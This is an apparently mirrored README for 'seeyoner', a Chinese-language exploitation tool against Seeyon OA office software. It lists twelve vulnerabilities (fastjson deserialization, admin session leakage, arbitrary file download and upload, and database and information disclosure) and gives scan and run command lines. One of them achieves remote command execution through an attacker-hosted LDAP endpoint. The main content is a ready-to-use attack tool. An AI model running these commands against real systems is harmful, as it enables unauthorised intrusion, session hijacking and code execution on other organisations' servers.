Giter VIP home page Giter VIP logo

seeyon-exploit's Introduction

seeyoner

致远OA漏洞利用工具

Usage

D:\>seeyoner.exe -h
        seeyoner v1.0 by x51
Usage:seeyoner.exe -u http://192.168.1.1:8080/ -vn all -m scan
Options:
  -a string
        run mode ldap args
  -c string
        run mode command args
  -h    print this help info.
  -m string
        mode:scan/run
  -show
        show vuln list.
  -u string
        target url.
  -vn string
        vuln number,[1,2,...]

scan

全漏洞探测:

seeyoner.exe -u http://xxx.com -vn all -m scan

image
指定漏洞探测: -vn指定漏洞编号,可通过-show参数查看:

D:\>seeyoner.exe -show

漏洞列表:
1、seeyon<8.0_fastjson反序列化
2、thirdpartyController.do管理员session泄露
3、webmail.do任意文件下载(CNVD-2020-62422)
4、ajax.do未授权&任意文件上传
5、getSessionList泄露Session
6、htmlofficeservlet任意文件上传
7、initDataAssess.jsp信息泄露
8、DownExcelBeanServlet信息泄露
9、createMysql.jsp数据库信息泄露
10、test.jsp路径
11、setextno.jsp路径
12、status.jsp路径(状态监控页面)

探测seeyon<8.0_fastjson反序列化漏洞:

seeyoner.exe -u http://xxx.com -vn 1 -m scan

run

以Session泄露+zip文件上传解压为例,指定编号为2

seeyoner.exe -u http://xxxx.com -vn 2 -m run

image

seeyon<8.0_fastjson反序列化利用起来比较特殊,也只有该漏洞会用到-a-c参数:
-a指定你的LDAP服务地址,-c指定需要执行的系统命令

seeyoner.exe -u http://xxxx.com -vn 1 -m run -a ldap://x.x.x.x:1389/TomcatBypass/TomcatEcho -c whoami

image

seeyon-exploit's People

Contributors

xfiftyone avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.